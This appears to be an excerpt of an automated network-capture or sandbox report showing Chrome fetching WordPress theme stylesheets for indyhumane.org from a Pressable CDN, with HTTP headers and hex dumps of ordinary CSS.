                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 77 70 2d 62 6c 6f 63 6b 2d 63 6f 64 65 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 64 65 20 63 6f 64 65 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 6f 76 65 72 66 6c 6f 77 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 70 72 65 2d 77 72 61 70 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 6e 6f 72 6d 61 6c 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 21 69 6d 70 6f 72 74 61 6e 74 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d
                                                                                                                                                                                                                                                        Data Ascii: wp-block-code{box-sizing:border-box}.wp-block-code code{display:block;font-family:inherit;overflow-wrap:break-word;white-space:pre-wrap}.wp-block-columns{align-items:normal!important;box-sizing:border-box;display:flex;flex-wrap:wrap!important}@media (min-
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 2d 63 6f 6c 75 6d 6e 2e 69 73 2d 76 65 72 74 69 63 61 6c 6c 79 2d 61 6c 69 67 6e 65 64 2d 63 65 6e 74 65 72 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 63 65 6e 74 65 72 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 2e 69 73 2d 76 65 72 74 69 63 61 6c 6c 79 2d 61 6c 69 67 6e 65 64 2d 62 6f 74 74 6f 6d 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 78 2d 65 6e 64 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 2e 69 73 2d 76 65 72 74 69 63 61 6c 6c 79 2d 61 6c 69 67 6e 65 64 2d 73 74 72 65 74 63 68 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 73 74 72 65 74 63 68 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 2e 69 73 2d 76 65 72 74 69 63 61 6c 6c 79 2d 61 6c 69 67 6e 65 64 2d 62 6f 74 74 6f 6d 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 2e 69 73 2d 76 65
                                                                                                                                                                                                                                                        Data Ascii: -column.is-vertically-aligned-center{align-self:center}.wp-block-column.is-vertically-aligned-bottom{align-self:flex-end}.wp-block-column.is-vertically-aligned-stretch{align-self:stretch}.wp-block-column.is-vertically-aligned-bottom,.wp-block-column.is-ve
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 6b 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 65 6d 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 63 6f 6d 6d 65 6e 74 73 20 2e 63 6f 6d 6d 65 6e 74 2d 62 6f 64 79 20 2e 63 6f 6d 6d 65 6e 74 6d 65 74 61 64 61 74 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 63 6f 6d 6d 65 6e 74 73 20 2e 63 6f 6d 6d 65 6e 74 2d 66 6f 72 6d 2d 61 75 74 68 6f 72 20 6c 61 62 65 6c 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 63 6f 6d 6d 65 6e 74 73 20 2e 63 6f 6d 6d 65 6e 74 2d 66 6f 72 6d 2d 63 6f 6d 6d 65 6e 74 20 6c 61 62 65 6c 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 63 6f 6d 6d 65 6e 74 73 20 2e 63 6f 6d 6d 65 6e 74 2d 66 6f 72 6d 2d 65 6d 61 69 6c 20 6c
                                                                                                                                                                                                                                                        Data Ascii: k;margin-bottom:1em;margin-top:1em}.wp-block-post-comments .comment-body .commentmetadata{font-size:.875em}.wp-block-post-comments .comment-form-author label,.wp-block-post-comments .comment-form-comment label,.wp-block-post-comments .comment-form-email l
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 65 6e 74 73 2d 70 61 67 69 6e 61 74 69 6f 6e 3e 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6d 6d 65 6e 74 73 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 6e 75 6d 62 65 72 73 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6d 6d 65 6e 74 73 2d 70 61 67 69 6e 61 74 69 6f 6e 3e 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6d 6d 65 6e 74 73 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 70 72 65 76 69 6f 75 73 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6d 6d 65 6e 74 73 2d 70 61 67 69 6e 61 74 69 6f 6e 3e 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6d 6d 65 6e 74 73 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 6e 65 78 74 3a 6c 61 73 74 2d 63 68 69 6c 64 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6d 6d 65 6e 74 73 2d
                                                                                                                                                                                                                                                        Data Ascii: ents-pagination>.wp-block-comments-pagination-numbers,.wp-block-comments-pagination>.wp-block-comments-pagination-previous{margin-bottom:.5em;margin-right:.5em}.wp-block-comments-pagination>.wp-block-comments-pagination-next:last-child,.wp-block-comments-
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 74 7b 66 6c 6f 61 74 3a 72 69 67 68 74 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6d 6d 65 6e 74 2d 64 61 74 65 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2e 63 6f 6d 6d 65 6e 74 2d 61 77 61 69 74 69 6e 67 2d 6d 6f 64 65 72 61 74 69 6f 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6d 6d 65 6e 74 2d 61 75 74 68 6f 72 2d 6e 61 6d 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6d 6d 65 6e 74 2d 63 6f 6e 74 65 6e 74 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6d 6d 65 6e 74 2d 65 64 69 74 2d 6c 69 6e 6b 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6d 6d 65 6e 74 2d 72 65 70 6c 79 2d 6c 69 6e 6b 7b 62 6f 78 2d 73 69 7a
                                                                                                                                                                                                                                                        Data Ascii: t{float:right}.wp-block-comment-date{box-sizing:border-box}.comment-awaiting-moderation{display:block;font-size:.875em;line-height:1.5}.wp-block-comment-author-name,.wp-block-comment-content,.wp-block-comment-edit-link,.wp-block-comment-reply-link{box-siz
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 3a 6e 6f 74 28 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 67 72 61 64 69 65 6e 74 29 3a 62 65 66 6f 72 65 7b 62 6f 74 74 6f 6d 3a 30 3b 6c 65 66 74 3a 30 3b 6f 70 61 63 69 74 79 3a 2e 35 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 30 3b 74 6f 70 3a 30 3b 7a 2d 69 6e 64 65 78 3a 31 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d 69 6d 61 67 65 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2d 31 30 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 5f 5f 62 61 63 6b 67 72 6f 75 6e 64 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d 69 6d 61 67 65 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2e
                                                                                                                                                                                                                                                        Data Ascii: s-background-dim:not(.has-background-gradient):before{bottom:0;left:0;opacity:.5;position:absolute;right:0;top:0;z-index:1}.wp-block-cover-image.has-background-dim.has-background-dim-10 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        2192.168.2.449744192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC591OUTGET /wp-content/themes/thrive-theme/style.css?ver=6.7.1 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC618INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:09 GMT
                                                                                                                                                                                                                                                        Content-Type: text/css
                                                                                                                                                                                                                                                        Content-Length: 18512
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/themes/thrive-theme/style.css>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Mon, 16 Dec 2024 17:13:47 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 1.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC751INData Raw: 2f 2a 0a 54 68 65 6d 65 20 4e 61 6d 65 3a 20 54 68 72 69 76 65 20 54 68 65 6d 65 20 42 75 69 6c 64 65 72 0a 54 68 65 6d 65 20 55 52 49 3a 20 68 74 74 70 73 3a 2f 2f 74 68 72 69 76 65 74 68 65 6d 65 73 2e 63 6f 6d 2f 0a 41 75 74 68 6f 72 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 68 72 69 76 65 74 68 65 6d 65 73 2e 63 6f 6d 22 3e 54 68 72 69 76 65 20 54 68 65 6d 65 73 3c 2f 61 3e 0a 44 65 73 63 72 69 70 74 69 6f 6e 3a 20 54 68 72 69 76 65 20 54 68 65 6d 65 20 42 75 69 6c 64 65 72 20 6c 65 74 73 20 79 6f 75 20 76 69 73 75 61 6c 6c 79 20 64 65 73 69 67 6e 2c 20 62 75 69 6c 64 2c 20 65 64 69 74 20 61 6e 64 20 63 75 73 74 6f 6d 69 7a 65 20 65 76 65 72 79 20 61 73 70 65 63 74 20 6f 66 20 79 6f 75 72 20 57 6f 72 64 50 72 65 73 73 20 77 65 62 73
                                                                                                                                                                                                                                                        Data Ascii: /*Theme Name: Thrive Theme BuilderTheme URI: https://thrivethemes.com/Author: <a href="https://thrivethemes.com">Thrive Themes</a>Description: Thrive Theme Builder lets you visually design, build, edit and customize every aspect of your WordPress webs
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 30 2c 31 30 2c 2e 38 35 29 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 7d 62 6f 64 79 3a 6e 6f 74 28 2e 64 65 66 61 75 6c 74 73 29 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 2a 2c 2a 3a 62 65 66 6f 72 65 2c 2a 3a 61 66 74 65 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 69 6e 68 65 72 69 74 7d 70 2c 6c 69 2c 62 6c 6f 63 6b 71 75 6f 74 65 2c 71 2c 70 72 65 2c 63 6f 64 65 2c 6b 62 64 2c 73 61 6d 70 7b 63 6f 6c 6f 72 3a 72 67 62 61 28 31 30 2c 31 30 2c 31 30 2c 2e 38 35 29 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 37 35
                                                                                                                                                                                                                                                        Data Ascii: 0,10,.85);font-size:1rem;line-height:1.5}body:not(.defaults){background:#fff;margin:0;padding:0}*,*:before,*:after{box-sizing:inherit}p,li,blockquote,q,pre,code,kbd,samp{color:rgba(10,10,10,.85);font-family:Arial,sans-serif;font-size:1rem;line-height:1.75
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 61 72 67 69 6e 3a 35 70 78 20 30 3b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 32 70 78 20 73 6f 6c 69 64 20 23 63 63 63 7d 62 6c 6f 63 6b 71 75 6f 74 65 3a 62 65 66 6f 72 65 2c 62 6c 6f 63 6b 71 75 6f 74 65 3a 61 66 74 65 72 2c 71 3a 62 65 66 6f 72 65 2c 71 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 22 22 7d 62 6c 6f 63 6b 71 75 6f 74 65 3e 70 2c 71 3e 70 7b 66 6f 6e 74 3a 69 6e 68 65 72 69 74 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 20 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 20 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 70 61 64 64 69 6e 67 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 3a 30 20 21 69 6d 70 6f 72
                                                                                                                                                                                                                                                        Data Ascii: argin:5px 0;border-left:2px solid #ccc}blockquote:before,blockquote:after,q:before,q:after{content:""}blockquote>p,q>p{font:inherit !important;line-height:inherit !important;color:inherit !important;border:0 !important;padding:0 !important;margin:0 !impor
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 69 73 61 62 6c 65 64 5d 7b 63 75 72 73 6f 72 3a 64 65 66 61 75 6c 74 7d 62 75 74 74 6f 6e 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 69 6e 70 75 74 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 69 6e 70 75 74 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 7d 69 6e 70 75 74 5b 74 79 70 65 3d 63 68 65 63 6b 62 6f 78 5d 2c 69 6e 70 75 74 5b 74 79 70 65 3d 72 61 64 69 6f 5d 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 70 61 64 64 69 6e 67 3a 30 7d 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 3a 3a 2d 77 65 62 6b 69 74 2d 69 6e 6e 65 72 2d 73 70 69 6e 2d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 3a 3a 2d
                                                                                                                                                                                                                                                        Data Ascii: isabled]{cursor:default}button::-moz-focus-inner,input::-moz-focus-inner{border:0;padding:0}input{line-height:normal}input[type=checkbox],input[type=radio]{box-sizing:border-box;padding:0}input[type=number]::-webkit-inner-spin-button,input[type=number]::-
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 79 70 65 3d 77 65 65 6b 5d 2c 69 6e 70 75 74 5b 74 79 70 65 3d 74 69 6d 65 5d 2c 69 6e 70 75 74 5b 74 79 70 65 3d 64 61 74 65 74 69 6d 65 5d 2c 69 6e 70 75 74 5b 74 79 70 65 3d 64 61 74 65 74 69 6d 65 2d 6c 6f 63 61 6c 5d 2c 69 6e 70 75 74 5b 74 79 70 65 3d 63 6f 6c 6f 72 5d 2c 74 65 78 74 61 72 65 61 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 7d 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 78 74 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 65 6d 61 69 6c 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 75 72 6c 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 70 61 73 73 77 6f 72 64 5d 3a 66 6f 63 75 73 2c 69 6e 70 75
                                                                                                                                                                                                                                                        Data Ascii: ype=week],input[type=time],input[type=datetime],input[type=datetime-local],input[type=color],textarea{border:1px solid #ccc;border-radius:3px;padding:10px}input[type=text]:focus,input[type=email]:focus,input[type=url]:focus,input[type=password]:focus,inpu
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 7d 2e 74 63 62 2d 70 6f 73 74 2d 63 6f 6e 74 65 6e 74 20 70 2e 68 61 73 2d 6c 61 72 67 65 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 36 70 78 7d 2e 74 63 62 2d 70 6f 73 74 2d 63 6f 6e 74 65 6e 74 20 70 2e 68 61 73 2d 6c 61 72 67 65 72 2d 66 6f 6e 74 2d 73 69 7a 65 2c 2e 74 63 62 2d 70 6f 73 74 2d 63 6f 6e 74 65 6e 74 20 70 2e 68 61 73 2d 68 75 67 65 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 32 70 78 7d 62 6f 64 79 2e 74 68 65 6d 65 2d 68 61 73 2d 6f 66 66 2d 73 63 72 65 65 6e 2d 73 69 64 65 62 61 72 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 70 61 64 64 69 6e 67 2d 6c 65 66 74 20 2e 34 32
                                                                                                                                                                                                                                                        Data Ascii: -font-size{font-size:20px}.tcb-post-content p.has-large-font-size{font-size:36px}.tcb-post-content p.has-larger-font-size,.tcb-post-content p.has-huge-font-size{font-size:42px}body.theme-has-off-screen-sidebar{position:relative;transition:padding-left .42
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 2d 6f 66 66 2d 73 63 72 65 65 6e 2d 73 69 64 65 3d 6c 65 66 74 5d 2e 76 69 73 69 62 6c 65 2d 6f 66 66 2d 73 63 72 65 65 6e 2d 73 69 64 65 62 61 72 5b 64 61 74 61 2d 6f 66 66 2d 73 63 72 65 65 6e 2d 74 79 70 65 3d 70 75 73 68 5d 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 76 61 72 28 2d 2d 6f 66 66 2d 73 63 72 65 65 6e 2d 73 69 64 65 62 61 72 2d 73 69 7a 65 29 7d 62 6f 64 79 2e 74 68 65 6d 65 2d 68 61 73 2d 6f 66 66 2d 73 63 72 65 65 6e 2d 73 69 64 65 62 61 72 5b 64 61 74 61 2d 6f 66 66 2d 73 63 72 65 65 6e 2d 73 69 64 65 3d 6c 65 66 74 5d 2e 76 69 73 69 62 6c 65 2d 6f 66 66 2d 73 63 72 65 65 6e 2d 73 69 64 65 62 61 72 20 2e 73 69 64 65 62 61 72 2d 73 65 63 74 69 6f 6e 7b 6c 65 66 74 3a 30 7d 62 6f 64 79 2e 74 68 65 6d 65 2d 68 61 73 2d 6f 66 66 2d 73 63 72
                                                                                                                                                                                                                                                        Data Ascii: -off-screen-side=left].visible-off-screen-sidebar[data-off-screen-type=push]{padding-left:var(--off-screen-sidebar-size)}body.theme-has-off-screen-sidebar[data-off-screen-side=left].visible-off-screen-sidebar .sidebar-section{left:0}body.theme-has-off-scr
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 61 79 2d 63 6f 6c 6f 72 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 37 29 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 7d 2e 61 64 6d 69 6e 2d 62 61 72 20 23 77 72 61 70 70 65 72 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 33 32 70 78 29 7d 23 77 72 61 70 70 65 72 20 2e 68 69 64 65 2d 73 65 63 74 69 6f 6e 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 62 6f 64 79 3a 6e 6f 74 28 2e 74 68 72 69 76 65 5f 73 68 6f 77 5f 68 69 64 64 65 6e 5f 65 6c 65 6d 65 6e 74 73 29 20 23 77 72 61 70 70 65 72
                                                                                                                                                                                                                                                        Data Ascii: ay-color: rgba(0, 0, 0, .7);margin:0;padding:0;position:relative;display:flex;flex-direction:column;min-height:100vh}.admin-bar #wrapper{min-height:calc(100vh - 32px)}#wrapper .hide-section{position:relative}body:not(.thrive_show_hidden_elements) #wrapper
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 61 69 6e 2d 63 6f 6e 74 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 77 69 64 74 68 3a 31 30 38 30 70 78 3b 77 69 64 74 68 3a 76 61 72 28 2d 2d 6c 61 79 6f 75 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 77 69 64 74 68 29 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 7a 2d 69 6e 64 65 78 3a 30 7d 2e 74 68 65 6d 65 2d 73 65 63 74 69 6f 6e 7b 66 6c 65 78 2d 73 68 72 69 6e 6b 3a 31 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f
                                                                                                                                                                                                                                                        Data Ascii: ain-content-background{height:100%;width:1080px;width:var(--layout-background-width);max-width:100%;position:absolute;top:0;overflow:hidden;margin:0;padding:0;z-index:0}.theme-section{flex-shrink:1;position:relative;margin:0;padding:0;box-sizing:border-bo
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 6e 74 2d 73 65 63 74 69 6f 6e 7b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 6f 72 64 65 72 3a 31 3b 77 69 64 74 68 3a 63 61 6c 63 28 37 30 25 20 2d 20 31 30 70 78 29 3b 77 69 64 74 68 3a 63 61 6c 63 28 31 30 30 25 20 2d 20 76 61 72 28 2d 2d 73 69 64 65 62 61 72 2d 73 69 7a 65 29 20 2d 20 76 61 72 28 2d 2d 73 65 70 61 72 61 74 6f 72 2d 73 69 7a 65 29 2a 2e 35 29 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 63 6f 6e 74 65 6e 74 2d 73 65 63 74 69 6f 6e 2e 63 6f 6e 74 65 6e 74 2d 66 75 6c 6c 2d 77 69 64 74 68 7b 77 69 64 74 68 3a 31 30 30 25 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 73 69 64 65 62 61 72 2d 73 65 63 74 69 6f 6e 7b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 6f 72 64 65 72 3a 33 3b 77 69 64 74 68 3a 63 61 6c 63 28 33 30 25 20 2d 20 31 30 70 78 29 3b 77 69 64 74 68 3a
                                                                                                                                                                                                                                                        Data Ascii: nt-section{flex-grow:1;order:1;width:calc(70% - 10px);width:calc(100% - var(--sidebar-size) - var(--separator-size)*.5) !important}.content-section.content-full-width{width:100% !important}.sidebar-section{flex-grow:1;order:3;width:calc(30% - 10px);width:


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        3192.168.2.449748192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC588OUTGET /wp-content/themes/indy-humane/style.css?ver=1.0 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC592INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:09 GMT
                                                                                                                                                                                                                                                        Content-Type: text/css
                                                                                                                                                                                                                                                        Content-Length: 403
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/themes/indy-humane/style.css>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Tue, 21 May 2024 11:41:33 GMT
